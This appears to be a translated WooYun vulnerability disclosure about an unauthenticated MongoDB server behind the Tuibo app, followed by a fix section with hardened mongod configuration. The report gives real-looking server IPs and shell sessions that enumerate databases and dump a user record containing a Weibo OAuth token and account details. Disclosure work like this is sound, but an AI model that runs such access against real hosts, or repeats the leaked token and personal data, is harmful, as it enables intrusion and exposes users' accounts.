
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-092235

Title: 推播 (Tuibo) MongoDB unauthorized access

Vendor: 推播

Author: 接盘侠

Submitted: 2015-01-19 10:41

Fix time: 2015-03-05 10:42

Disclosure time: 2015-03-05 10:42

Vulnerability type: Unauthorized access / privilege bypass

Severity: Medium

Self-assessed Rank: 10

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-01-19: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-03-05: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

MongoDB unauthorized access; information on 200,000 users leaked.

Details:

118.192.69.205:28017
118.192.69.204:28017

mongo 118.192.69.205
> show dbs
admin (empty)
butter 0.203GB
clock_bugtracher (empty)
clock_bugtracker 0.203GB
kfc1007 5.951GB
local (empty)
test (empty)
zombie 0.203GB
> db.user.find().limit(1).pretty()
{
"_id" : ObjectId("5195ed8a34b3d012352a68d8"),
"account" : "weibo_3373253644",
"avatar" : "http://tuibo.qiniudn.com/bb1e78328d5f41c5894d685e704f8dde.jpg",
"client" : "ios",
"followed" : 8,
"followed_by" : 6,
"maitaed_by" : 4,
"message" : {
"followed_by" : 1,
"global_old" : 68,
"person" : 0,
"pushed_by" : 5,
"pushed_by_ts" : NumberLong(1400676552),
"reply_by" : 1,
"reply_by_ts" : NumberLong(1400923537),
"system" : 0,
"system_ts" : 1374838772.499371
},
"new_messages" : 30,
"nickname" : "赤脚大怪",
"options" : {
"push_for_follow" : true,
"push_for_push" : true,
"push_for_reply" : true,
"push_for_system" : true,
"sync_for_weibo" : true
},
"others" : {
"background" : "http://tuibo.qiniudn.com/20351667c94e4bd6925843f04d11186d.jpg",
"large_avatar" : "http://tuibo.qiniudn.com//30299d49f4ac4d1dab73765ba06c9d2e.jpg"
},
"published" : 11,
"pushed" : 44,
"pushed_by" : 28,
"read_mark_ts" : {
"followed_by" : 1373339501.393544,
"pushed_by" : 1378267308.834958,
"reply_by" : 1374838326.28418,
"system" : 1378267287.80178
},
"register_time" : 1368780170.967144,
"thirdpart_info" : {
"weibo" : {
"token" : "2.00q3pRgDHOrzQD3c57de3709riYiQB",
"user_account" : "3373253644",
"expires" : "1384110002.766556",
"user_nickname" : "赤脚大怪"
}
},
"update_time" : NumberLong(1403579370),
"user_description" : "每个人,都是生活发现者。"
}
> db.user.find().count()
224187


connecting to: 118.192.69.204/test
> show dbs
admin (empty)
corax_dev 5.951GB
local (empty)
zombie 0.203GB
> use corax_dev
switched to db corax_dev
> show collections
apns_token
banner
broadcast_msg
category
cron
day_push
follow
fusion
jump
login_account
maita
person_message
person_message_log
push
reply_message
session
sysmessage
system.indexes
system.users
system_message
system_message_global
temperature
topic
topic_comment
topic_comment_report
topic_report
user
users
weibo_bind_friends
weibo_mid
weibo_uid
> db.user.find().count()
238871


Proof of vulnerability:

Direct access

Fix:

Enable authorization
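As an added illustration (not part of the original report), this is what the fix above looks like in a mongod configuration file. The first fragment reproduces the exposed state implied by the sessions above: no authorization, listening on every interface, and the legacy HTTP status interface reachable on port 28017 (mongod's port plus 1000). The second fragment is the hardened equivalent. The option names (`security.authorization`, `net.bindIp`, `net.http.enabled`) are MongoDB's documented YAML settings for the 2.6 to 3.4 releases current at the time of this report; `net.http` was removed in MongoDB 3.6. The addresses shown are placeholders.

```yaml
# --- Exposed configuration (the state this report describes) ---
# No authentication: any client that can reach the port gets full access,
# including `show dbs` and `db.user.find()` as in the sessions above.
net:
  port: 27017
  bindIp: 0.0.0.0           # listens on every interface, including the public one
  http:
    enabled: true           # legacy status page on port 28017 (27017 + 1000)
# security.authorization is not set, so it defaults to "disabled"

---
# --- Hardened configuration ---
net:
  port: 27017
  bindIp: 127.0.0.1         # local clients only; use the app server's private address if needed
  http:
    enabled: false          # removes the 28017 status interface (option exists only before 3.6)
security:
  authorization: enabled    # every connection must authenticate and hold a role for what it does
```

With `authorization: enabled`, mongod rejects unauthenticated commands, so an administrative account must exist first: create it through the localhost exception (the first connection from the local host may create a user when none exist yet), for example `use admin` followed by `db.createUser({user: "admin", pwd: "<placeholder>", roles: ["userAdminAnyDatabase"]})` in the mongo shell, then restart with the new file. A host firewall that admits 27017 and 28017 only from the application hosts is the complementary network control; with both in place, the `mongo 118.192.69.205` connection shown in the proof would be refused outright or fail at authentication.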

Copyright notice: when reposting, please credit the source 接盘侠@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused the report